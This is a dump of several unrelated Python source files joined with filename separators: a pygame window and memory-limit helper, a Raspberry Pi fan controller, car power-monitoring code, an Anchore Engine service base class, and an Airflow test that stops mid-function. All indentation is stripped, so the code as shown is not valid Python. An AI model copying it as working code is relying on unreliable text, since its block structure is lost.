def create(title=None, size=(0,0), icon=None, resizable=False, noframe=False):
screen = _pg.display.set_mode(size)
if resizable:
screen = _pg.display.set_mode(size,_pg.RESIZABLE)
if noframe:
screen = _pg.display.set_mode(size,_pg.NOFRAME)
else:
if title != None:
_pg.display.set_caption(title)
if icon != None:
_pg.display.set_icon(_pg.image.load(icon))
return _win(icon)
def ramLimit(memory_limit):
if not nonwin32api:
g_hjob = None
def create_job(job_name='', breakaway='silent'):
hjob = _w32j.CreateJobObject(None, job_name)
if breakaway:
info = _w32j.QueryInformationJobObject(hjob,
_w32j.JobObjectExtendedLimitInformation)
if breakaway == 'silent':
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_SILENT_BREAKAWAY_OK)
else:
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_BREAKAWAY_OK)
_w32j.SetInformationJobObject(hjob,
_w32j.JobObjectExtendedLimitInformation, info)
return hjob
def assign_job(hjob):
global g_hjob
hprocess = _w32a.GetCurrentProcess()
try:
_w32j.AssignProcessToJobObject(hjob, hprocess)
g_hjob = hjob
except _w32j.error as e:
if (e._we != _we.ERROR_ACCESS_DENIED or
_sys.getwindowsversion() >= (6, 2) or
not _w32j.IsProcessInJob(hprocess, None)):
raise
_warn.warn('The process is already in a job. Nested jobs are not '
'supported prior to Windows 8.')
def limit_memory(memory_limit):
if g_hjob is None:
return
info = _w32j.QueryInformationJobObject(g_hjob,
_w32j.JobObjectExtendedLimitInformation)
info['ProcessMemoryLimit'] = memory_limit
info['BasicLimitInformation']['LimitFlags'] |= (
_w32j.JOB_OBJECT_LIMIT_PROCESS_MEMORY)
_w32j.SetInformationJobObject(g_hjob,
_w32j.JobObjectExtendedLimitInformation, info)
assign_job(create_job())
limit_memory(memory_limit)
def close():
_pg.quit()
quit()
def getEvents():
return _pg.event.get()
|
raspberrypi_dht11_acfan_controller.py
|
"""Main module."""
import os
# print(os.getpid())
import queue
import signal
import threading
import logging
import logging.config
from os import kill
from threading import Thread
# Import our packets
print("importing your libraries")
from bot import run_bot
from fan_caller import DHT11_Fan_caller
print("done!")
# Logger setup
logging.config.fileConfig('logging.conf')
logger = logging.getLogger('MAIN')
# ""MAIN""
def start():
'''
start program function. pretty easy, creates thread 1 with fan_caller and thread 2 with bot. Has a sigusr1 signal handler to "send" a flag to fan_caller when to
stop.
'''
# SIGUSR1 handler. Used to gently kill thread 1 when SIGINT or SIGTERM are called
# SIGUSR1 is sent from bot
def sigusr1_handler(*args):
logger.debug(
"Signal SIGUSR1 Received - Killing DHT11_Fan_caller process ")
print("signal received")
pill2kill.set()
# wait for t1 to end
t1.join()
# kill the rest of the program
logger.debug("Killing main module")
kill(os.getpid(), signal.SIGTERM)
signal.signal(signal.SIGUSR1, sigusr1_handler)
pill2kill = threading.Event()
q = queue.Queue()
t1 = Thread(target=DHT11_Fan_caller, args=(q, pill2kill))
t1.start()
run_bot(q)
if __name__ == '__main__':
logger.debug("__name__ == __main__ STARTING program")
start()
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
PANDA_OUTPUT_VOLTAGE = 5.28
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
# Parameters
def get_battery_capacity():
return _read_param("/sys/class/power_supply/battery/capacity", int)
# Helpers
def _read_param(path, parser, default=0):
try:
with open(path) as f:
return parser(f.read())
except Exception:
return default
def panda_current_to_actual_current(panda_current):
# From white/grey panda schematic
return (3.3 - (panda_current * 3.3 / 4096)) / 8.25
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of pandaState voltage
self.car_voltage_instant_mV = 12e3 # Last value of pandaState voltage
self.integration_lock = threading.Lock()
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, pandaState):
try:
now = sec_since_boot()
# If pandaState is None, we're probably not in a car, so we don't care
if pandaState is None or pandaState.pandaState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = pandaState.pandaState.voltage
self.car_voltage_mV = ((pandaState.pandaState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if (pandaState.pandaState.ignitionLine or pandaState.pandaState.ignitionCan):
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = pandaState.pandaState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif HARDWARE.get_battery_status() == 'Discharging':
# If the battery is discharging, we can use this measurement
# On C2: this is low by about 10-15%, probably mostly due to UNO draw not being factored in
current_power = ((HARDWARE.get_battery_voltage() / 1000000) * (HARDWARE.get_battery_current() / 1000000))
elif (pandaState.pandaState.pandaType in [log.PandaState.PandaType.whitePanda, log.PandaState.PandaType.greyPanda]) and (pandaState.pandaState.current > 1):
# If white/grey panda, use the integrated current measurements if the measurement is not 0
# If the measurement is 0, the current is 400mA or greater, and out of the measurement range of the panda
# This seems to be accurate to about 5%
current_power = (PANDA_OUTPUT_VOLTAGE * panda_current_to_actual_current(pandaState.pandaState.current))
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t, current_power):
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self):
return int(self.power_used_uWh)
def get_car_battery_capacity(self):
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, pandaState, offroad_timestamp):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= (not pandaState.pandaState.ignitionLine and not pandaState.pandaState.ignitionCan)
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, pandaState, offroad_timestamp, started_seen):
if pandaState is None or offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (pandaState.pandaState.usbPowerMode != log.PandaState.UsbPowerMode.client)
BATT_PERC_OFF = 10
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(pandaState, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 60))
should_shutdown &= started_seen
return should_shutdown
|
service.py
|
"""
Base types for all anchore engine services
"""
import copy
import enum
import json
import os
import threading
import time
from pathlib import Path
import connexion
import yaml
from flask import g, jsonify
from anchore_engine import monitors
from anchore_engine.apis.authorization import get_authorizer, init_authz_handler
from anchore_engine.apis.exceptions import AnchoreApiError
from anchore_engine.clients.services import internal_client_for
from anchore_engine.clients.services.catalog import CatalogClient
from anchore_engine.common.helpers import make_response_error
from anchore_engine.configuration import localconfig
from anchore_engine.configuration.localconfig import InvalidOauthConfigurationError
from anchore_engine.db import db_services
from anchore_engine.db import initialize as initialize_db
from anchore_engine.db import session_scope
from anchore_engine.subsys import logger, metrics, servicestatus, taskstate
from anchore_engine.subsys.events import ServiceAuthzPluginHealthCheckFailed
from anchore_engine.subsys.identities import manager_factory
class LifeCycleStages(enum.IntEnum):
"""
Ordered lifecycle stages by execution order
"""
pre_config = 0
post_config = 1
pre_db = 2
post_db = 3
pre_credentials = 4
post_credentials = 5
pre_bootstrap = 6
post_bootstrap = 7
pre_register = 8
post_register = 9
# Default handlers set at system level, will be modified by instantiation of BaseService at instance-level
_default_lifecycle_handlers = {
LifeCycleStages.pre_config: [],
LifeCycleStages.post_config: [],
LifeCycleStages.pre_db: [],
LifeCycleStages.post_db: [],
LifeCycleStages.pre_credentials: [],
LifeCycleStages.post_credentials: [],
LifeCycleStages.pre_bootstrap: [],
LifeCycleStages.post_bootstrap: [],
LifeCycleStages.pre_register: [],
LifeCycleStages.post_register: [],
}
def handle_api_exception(ex: AnchoreApiError):
"""
Returns the proper json for marshalling an AnchoreApiError
:param ex:
:return:
"""
return (
jsonify(
make_response_error(
ex.message,
in_httpcode=ex.__response_code__,
details=ex.detail if ex.detail else {},
)
),
ex.__response_code__,
)
class ServiceMeta(type):
"""
Metaclass to create a registry for all subclasses of Gate for finding, building, and documenting the services
"""
def __init__(cls, name, bases, dct):
if not hasattr(cls, "registry"):
cls.registry = {}
else:
if "__service_name__" in dct:
svc_id = dct["__service_name__"].lower()
cls.registry[svc_id] = cls
super(ServiceMeta, cls).__init__(name, bases, dct)
def get_service_by_name(cls, name):
# Try direct name
found = cls.registry.get(name.lower())
if found:
return found
else:
raise KeyError(name)
def registered_service_types(cls):
return list(cls.registry.keys())
class BaseService(object, metaclass=ServiceMeta):
"""
Base type for all services to inherit from.
An anchore engine service always has:
healthcheck api - GET /health responds with 200 OK.
monitor thread - to schedule async tasks and handle service status updates upstream
versioned api - /vX/...
Services have similar bootstrap and initialization path:
self.configure() - load config
self.db_connect() - setup db connections
self.credential_init() - load system credentials
self.bootstrap() - service-specific bootstrap that involves db and maybe other services
self.register() - register the service in the db for discoverability
These are all invoked in order from the bootstrap() function directly.
Class variables:
__is_unique_service__ = determines whether the system should allow more than one of this service instance to be registered.
__service_name__ = The name used to identify this service class in both the service records and in config.
__db_enabled__ = True|False determines if this service depends on the db and should connnect (default = True)
__monitors__ = Dict of monitor configurations for this service
__monitor_fn__ = Function to invoke as base thread monitor
__service_api_version__ = str version name to use as prefix for api calls: e.g. /<__service_api_version__>/images
__lifecycle_handlers__ = dict of mappings from LifeCycleStages to (function, arg) pairs to merge into the global defaults on instantiation
"""
__is_unique_service__ = False
__service_name__ = None
__db_enabled__ = True
__monitors__ = {}
__monitor_fn__ = monitors.monitor
__service_api_version__ = "v1"
__lifecycle_handlers__ = {}
__require_system_user__ = True
__task_handlers_enabled__ = True
def __init__(self, options=None):
self.name = self.__service_name__
self.options = options if options is not None else {}
self.global_configuration = None
self.requires_db = None
self.require_system_user = self.__require_system_user__
self.lifecycle_handlers = copy.deepcopy(_default_lifecycle_handlers)
self.lifecycle_handlers.update(self.__lifecycle_handlers__)
self.instance_id = None
self.versions = None
self.configuration = None
self.fq_name = None
self.monitor_fn = self.__monitor_fn__
self.monitor_kwargs = {}
self.monitor_threads = {}
self.service_record = {}
self.task_handlers_enabled = self.__task_handlers_enabled__
@property
def is_enabled(self):
if self.configuration:
return self.configuration.get("enabled", False)
else:
return False
def _register_instance_handlers(self):
"""
Called before the bootstrap process is initiated to allow overriding classes to modify the handlers
:return:
"""
return
def _process_stage_handlers(self, stage):
logger.info(
"Processing init handlers for bootsrap stage: {}".format(stage.name)
)
handlers = self.lifecycle_handlers.get(stage, [])
logger.debug("Executing {} stage {} handlers".format(len(handlers), stage.name))
for handler_fn, handler_args in handlers:
try:
logger.debug(
"Invoking handler: {} with args {}".format(
handler_fn.__name__, handler_args
)
)
if handler_args is not None:
handler_fn(*handler_args)
else:
handler_fn()
logger.debug(
"Handler: {} completed successfully".format(
handler_fn.__name__, handler_args
)
)
except Exception as ex:
logger.exception(
"Pre-Stage Handler {} for service pre_config raised exception".format(
handler_fn.__name__
)
)
raise ex
def register_handler(self, stage, handler_fn, handler_args=None):
"""
Register handlers for specific lifecycle stages
:param stage: LifeCycleState enum obj to register for
:param handler_fn: function to invoke
:param handler_args: list of arguments to pass to the handler in order handler_fn(*handler_args)
:return:
"""
assert isinstance(stage, LifeCycleStages)
if stage in self.lifecycle_handlers:
self.lifecycle_handlers[stage].append((handler_fn, handler_args))
else:
raise KeyError(stage)
def _get_service_configuration(self, global_config):
"""
Extract service config from the global config.
Override or supplement this function if a service needs configuration that isn't strictly in its 'service' entry.
Should be a very rare occurance.
:param global_config:
:return: service configuration for this service
"""
assert self.__service_name__ in global_config["services"]
return global_config["services"][self.__service_name__]
def configure(self):
self._process_stage_handlers(LifeCycleStages.pre_config)
self._configure()
self._process_stage_handlers(LifeCycleStages.post_config)
def _init_versions(self):
"""
Initialize the service versions
:return:
"""
try:
self.versions = localconfig.get_versions()
except Exception as err:
logger.error("cannot detect versions of service: exception - " + str(err))
raise err
def _configure(self):
"""
Load service configuration
:return:
"""
logger.info("Loading and initializing global configuration")
self._init_versions()
self.configuration = self._get_service_configuration(self.global_configuration)
self.instance_id = localconfig.get_host_id()
self.fq_name = (self.name, self.instance_id)
self.task_handlers_enabled = self.configuration.get(
"task_handlers_enabled", True
)
env_setting = (
not os.environ.get("ANCHORE_ENGINE_DISABLE_MONITORS", "false").lower()
== "true"
)
self.task_handlers_enabled = self.task_handlers_enabled and env_setting
if not self.task_handlers_enabled:
if env_setting:
logger.warn(
"Task handlers disabled by setting ANCHORE_ENGINE_DISABLE_MONITORS in environment"
)
else:
logger.warn("Task handlers disabled by configuration file value")
try:
kick_timer = int(self.configuration["cycle_timer_seconds"])
except:
kick_timer = 1
try:
cycle_timers = {}
cycle_timers.update(self.configuration["cycle_timers"])
except:
cycle_timers = {}
self.monitor_kwargs["kick_timer"] = kick_timer
self.monitor_kwargs["cycle_timers"] = cycle_timers
self.monitor_kwargs["monitors"] = copy.deepcopy(self.__monitors__)
self.monitor_kwargs["monitor_threads"] = self.monitor_threads
self.monitor_kwargs["servicename"] = self.name
logger.info("Configuration complete")
def db_connect(self):
self._process_stage_handlers(LifeCycleStages.pre_db)
self._db_connect()
self._process_stage_handlers(LifeCycleStages.post_db)
def _db_connect(self):
"""
Initialize the db connection and prepare the db
:return:
"""
logger.info("Configuring db connection")
if not self.db_connect:
logger.info(
"DB Connection disabled in configuration for service {}. Skipping db init".format(
self.__service_name__
)
)
return True
logger.info("Initializing database")
# connect to DB
try:
initialize_db(localconfig=self.global_configuration, versions=self.versions)
except Exception as err:
logger.error("cannot connect to configured DB: exception - " + str(err))
raise err
logger.info("DB connection initialization complete")
def credential_init(self):
self._process_stage_handlers(LifeCycleStages.pre_credentials)
self._credential_init()
self._process_stage_handlers(LifeCycleStages.post_credentials)
def _credential_init(self):
logger.info("Bootstrapping credentials")
# credential bootstrap
self.global_configuration["system_user_auth"] = (None, None)
if self.require_system_user:
gotauth = False
max_retries = 60
self.global_configuration["system_user_auth"] = (None, None)
for count in range(1, max_retries):
try:
with session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
logger.info("Checking system creds")
c = mgr.get_system_credentials()
if c is not None:
logger.info("Found valid system creds")
gotauth = True
break
else:
logger.info("Did not find valid system creds")
logger.error(
"cannot get system user auth credentials yet, retrying ("
+ str(count)
+ " / "
+ str(max_retries)
+ ")"
)
time.sleep(5)
except InvalidOauthConfigurationError:
raise
except Exception as err:
logger.exception(
"cannot get system-user auth credentials - service may not have system level access"
)
self.global_configuration["system_user_auth"] = (None, None)
gotauth = False
if not gotauth:
raise Exception("service requires system user auth to start")
logger.info("Credential initialization complete")
def bootstrap(self):
self._process_stage_handlers(LifeCycleStages.pre_bootstrap)
self._bootstrap()
self._process_stage_handlers(LifeCycleStages.post_bootstrap)
def _bootstrap(self):
"""
Create and init the service
:return:
"""
# Do monitor-thread bootstraps here
logger.info("Bootstrapping service")
logger.info("Service bootstrap complete")
return True
def register(self):
self._process_stage_handlers(LifeCycleStages.pre_register)
self._register()
self._process_stage_handlers(LifeCycleStages.post_register)
def _register(self):
if not self.is_enabled:
logger.error(
"Service not enabled in config, not registering service: " + self.name
)
raise Exception("No service enabled, cannot continue bootstrap")
logger.info("Registering service: {}".format(self.name))
service_template = {
"type": "anchore",
"base_url": "N/A",
"status_base_url": "N/A",
"version": "v1",
"short_description": "",
}
hstring = "http"
if "external_tls" in self.configuration:
if self.configuration.get("external_tls", False):
hstring = "https"
elif "ssl_enable" in self.configuration:
if self.configuration.get("ssl_enable", False):
hstring = "https"
endpoint_hostname = endpoint_port = endpoint_hostport = None
if self.configuration.get("external_hostname", False):
endpoint_hostname = self.configuration.get("external_hostname")
elif self.configuration.get("endpoint_hostname", False):
endpoint_hostname = self.configuration.get("endpoint_hostname")
if self.configuration.get("external_port", False):
endpoint_port = int(self.configuration.get("external_port"))
elif self.configuration.get("port", False):
endpoint_port = int(self.configuration.get("port"))
if endpoint_hostname:
endpoint_hostport = endpoint_hostname
if endpoint_port:
endpoint_hostport = endpoint_hostport + ":" + str(endpoint_port)
if endpoint_hostport:
service_template["base_url"] = "{}://{}".format(hstring, endpoint_hostport)
else:
raise Exception(
"could not construct service base_url - please check service configuration for hostname/port settings"
)
try:
service_template["status"] = False
service_template["status_message"] = taskstate.base_state("service_status")
with session_scope() as dbsession:
service_records = db_services.get_byname(
self.__service_name__, session=dbsession
)
# fail if trying to add a service that must be unique in the system, but one already is registered in DB
if self.__is_unique_service__:
if len(service_records) > 1:
raise Exception(
"more than one entry for service type ("
+ str(self.__service_name__)
+ ") exists in DB, but service must be unique - manual DB intervention required"
)
for service_record in service_records:
if service_record and (
service_record["hostid"] != self.instance_id
):
raise Exception(
"service type ("
+ str(self.__service_name__)
+ ") already exists in system with different host_id - detail: my_host_id="
+ str(self.instance_id)
+ " db_host_id="
+ str(service_record["hostid"])
)
# if all checks out, then add/update the registration
ret = db_services.add(
self.instance_id,
self.__service_name__,
service_template,
session=dbsession,
)
try:
my_service_record = {
"hostid": self.instance_id,
"servicename": self.__service_name__,
}
my_service_record.update(service_template)
servicestatus.set_my_service_record(my_service_record)
self.service_record = my_service_record
except Exception as err:
logger.warn(
"could not set local service information - exception: {}".format(
str(err)
)
)
except Exception as err:
raise err
service_record = servicestatus.get_my_service_record()
servicestatus.set_status(
service_record,
up=True,
available=True,
update_db=True,
versions=self.versions,
)
logger.info("Service registration complete")
return True
def initialize(
self, global_configuration, db_connect=True, require_system_user_auth=None
):
"""
Service initialization that requires the service config loaded and available but before registration of the service
or db connection and access to service discovery.
:param name: str name of service instance
:param db_connect: override the __db_enabled__ class variable just for this instance. If false, no db init or connect is performed on bootstrap
:param global_configuration: dict of configuration data to use
:return: True on success
"""
self.global_configuration = global_configuration
self.requires_db = db_connect
if require_system_user_auth is not None:
self.require_system_user = require_system_user_auth
logger.debug("Invoking instance-specific handler registration")
self._register_instance_handlers()
self.configure()
self.db_connect()
self.credential_init()
self.bootstrap()
self.register()
return True
def get_monitor_thread(self, monitor_thread_wrapper=None):
"""
Start the service and return a thread to execute the monitor. Caller must actually start the monitor thread for this service.
:param monitor_thread_wrapper: function that takes the target function and **kwargs as arguments and returns an object expected by the caller
:return:
"""
if self.task_handlers_enabled:
if monitor_thread_wrapper:
t = monitor_thread_wrapper(self.monitor_fn, **self.monitor_kwargs)
else:
t = threading.Thread(target=self.monitor_fn, kwargs=self.monitor_kwargs)
return t
else:
return None
class ApiService(BaseService):
"""
A service that provides an api
"""
__spec_dir__ = "swagger"
__spec_file__ = "swagger.yaml"
__service_api_version__ = "v1"
def __init__(self, options=None):
super().__init__(options=options)
self._api_application = None
self.yosai = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
logger.info("Registering api handlers")
self.register_handler(LifeCycleStages.pre_bootstrap, self.initialize_api, None)
def _init_wsgi_app(self, service_name, api_spec_dir=None, api_spec_file=None):
"""
Return an initialized service with common api resource and auth config
:return:
"""
try:
enable_swagger_ui = False
if self.configuration.get("enable_swagger_ui", None) is not None:
enable_swagger_ui = self.configuration.get("enable_swagger_ui")
elif self.global_configuration.get("enable_swagger_ui", None) is not None:
enable_swagger_ui = self.global_configuration.get("enable_swagger_ui")
flask_app_options = {"swagger_ui": enable_swagger_ui}
self._application = connexion.FlaskApp(
__name__, specification_dir=api_spec_dir, options=flask_app_options
)
flask_app = self._application.app
flask_app.url_map.strict_slashes = False
# Ensure jsonify() calls add whitespace for nice error responses
flask_app.config["JSONIFY_PRETTYPRINT_REGULAR"] = True
# Suppress some verbose logs in dependencies
import logging as py_logging
py_logging.basicConfig(level=py_logging.ERROR)
# Initialize the authentication system
self.init_auth()
flask_app.before_request(self._inject_service)
flask_app.register_error_handler(AnchoreApiError, handle_api_exception)
metrics.init_flask_metrics(flask_app, servicename=service_name)
self._application.add_api(
Path(api_spec_file),
validate_responses=self.options.get("validate-responses"),
)
return self._application
except Exception as err:
logger.exception("Error initializing WSGI application")
raise
def init_auth(self):
"""
Initializes the authentication subsystem as needed
:return:
"""
# Initialize the wrapper
init_authz_handler(configuration=self.configuration)
def _inject_service(self):
"""
Adds a reference to the service object into the request's app context
:return:
"""
g.service = self
def initialize_api(self):
"""
Initialize the api and return the wsgi application object
:return:
"""
logger.info(
"Initializing API from: {}/{}".format(self.__spec_dir__, self.__spec_file__)
)
if (
self.configuration["listen"]
and self.configuration["port"]
and self.configuration["endpoint_hostname"]
):
if not self._api_application:
self._api_application = self._init_wsgi_app(
self.__service_name__, self.__spec_dir__, self.__spec_file__
)
def get_api_application(self):
if self._api_application is None:
raise Exception(
"API not initialized yet. Must initialize the service or call initialize_api() before the application is available"
)
return self._api_application.app
@staticmethod
def build_authz_heartbeat(service_name):
"""
Returns the handler function itself (uses closure to pass some values in
:return:
"""
def authz_heartbeat(*args, **kwargs):
cycle_timer = kwargs["mythread"]["cycle_timer"]
logger.info("Checking authz availability")
try:
host_id = localconfig.get_host_id()
authz_handlr = get_authorizer()
handler = authz_handlr.__class__.__name__
ex = None
try:
result = authz_handlr.healthcheck()
except Exception as e:
ex = e
result = False
if not result:
fail_event = ServiceAuthzPluginHealthCheckFailed(
user_id=localconfig.ADMIN_ACCOUNT_NAME,
name=service_name,
host=host_id,
plugin=handler,
details=str(ex),
)
logger.info(
"Sending healthcheck failure event: {}".format(
fail_event.__event_type__
)
)
try:
client = internal_client_for(
CatalogClient, localconfig.ADMIN_ACCOUNT_NAME
)
client.add_event(fail_event)
except Exception as ex:
logger.exception(
"Failure to send authz healthcheck failure event: {}".format(
fail_event.to_json()
)
)
except Exception as e:
logger.exception(
"Caught unexpected exception from the authz heartbeat handler"
)
time.sleep(cycle_timer)
return True
return authz_heartbeat
class UserFacingApiService(ApiService):
def __init__(self, options=None):
super().__init__(options)
self._authz_actions = {}
self.api_spec = None
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(
LifeCycleStages.pre_bootstrap, self._process_api_spec, None
)
@staticmethod
def parse_swagger(path):
with open(path) as f:
if path.endswith("yaml") or path.endswith("yml"):
return yaml.safe_load(f)
else:
return json.load(f)
@staticmethod
def build_action_map(swagger_content):
"""
Given a dict from the swagger spec (must be fully materialized, no external refs), determine the mapping
of a operation to an action using x-anchore-action labels in the swagger.
This relies on using connexion such that the x-swagger-router-controller + operationId define the key as is implemented
in connexion. The resulting dict maps a fully-qualified function to an action
:param swagger_content: dict
:return: dict function_name -> action (e.g. anchore_engine.services.apiext.images.list_images -> listImages)
"""
action_map = {}
for path in swagger_content.get("paths").values():
for verb in path.values():
action = verb.get("x-anchore-authz-action")
controller = verb.get("x-swagger-router-controller")
operationId = verb.get("operationId")
action_map[controller + "." + operationId] = action
return action_map
def _process_api_spec(self):
try:
self.api_spec = UserFacingApiService.parse_swagger(
os.path.join(self.__spec_dir__, self.__spec_file__)
)
actions = UserFacingApiService.build_action_map(self.api_spec)
missing = [x for x in filter(lambda x: x[1] is None, actions.items())]
if missing:
raise Exception(
"API Spec validation error: All operations must have a x-anchore-authz-action label. Missing for: {}".format(
missing
)
)
else:
self._authz_actions = actions
except Exception as ex:
logger.exception(
"Error loading swagger spec for authz action parsing. Cannot proceed"
)
raise ex
def action_for_operation(self, fq_operation_id):
"""
Raises KeyError if id not found
:param fq_operation_id:
:return:
"""
return self._authz_actions[fq_operation_id]
|
test_local_task_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import time
import unittest
from mock import patch
from airflow import AirflowException, models, settings
from airflow.configuration import conf
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs import LocalTaskJob
from airflow.models import DAG, TaskInstance as TI
from airflow.operators.dummy_operator import DummyOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from tests.test_utils.db import clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
def setUp(self):
clear_db_runs()
patcher = patch('airflow.jobs.base_job.sleep')
self.addCleanup(patcher.stop)
self.mock_base_job_sleep = patcher.start()
def test_localtaskjob_essential_attr(self):
"""
Check whether essential attributes
of LocalTaskJob can be assigned with
proper values without intervention
"""
dag = DAG(
'test_localtaskjob_essential_attr',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id="test",
state=State.SUCCESS,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE)
ti = dr.get_task_instance(task_id=op1.task_id)
job1 = LocalTaskJob(task_instance=ti,
ignore_ti_state=True,
executor=SequentialExecutor())
essential_attr = ["dag_id", "job_type", "start_date", "hostname"]
check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
self.assertTrue(all(check_result_1))
check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
self.assertTrue(all(check_result_2))
@patch('os.getpid')
def test_localtaskjob_heartbeat(self, mock_pid):
session = settings.Session()
dag = DAG(
'test_localtaskjob_heartbeat',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
